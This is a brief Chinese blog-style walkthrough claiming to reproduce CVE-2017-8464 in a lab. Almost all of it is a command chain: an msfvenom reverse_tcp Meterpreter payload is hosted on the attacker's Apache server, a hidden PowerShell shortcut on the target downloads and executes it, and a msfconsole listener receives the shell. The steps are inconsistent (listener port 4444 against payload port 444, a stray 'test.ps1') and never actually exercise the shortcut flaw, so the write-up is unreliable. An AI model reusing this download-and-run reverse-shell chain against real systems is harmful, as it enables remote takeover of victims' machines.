首页 > 代码库 > CVE-2017-8464复现 (远程快捷方式漏洞)
CVE-2017-8464复现 (远程快捷方式漏洞)
我们的攻击机IP是192.168.222.133
目标机IP是192.168.222.132
我们首先生成一个powershell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1
把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html
service apache2 start 然后我们访问127.0.0.1/1.ps1 是可以访问的
我们在目标机创建快捷方式powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.222.133/1.ps1‘);test.ps1"
然后访问
创建监听,然后连接meterpreter
msfconsole
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.222.133
set LPORT 4444
exploit
复现成功
CVE-2017-8464复现 (远程快捷方式漏洞)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。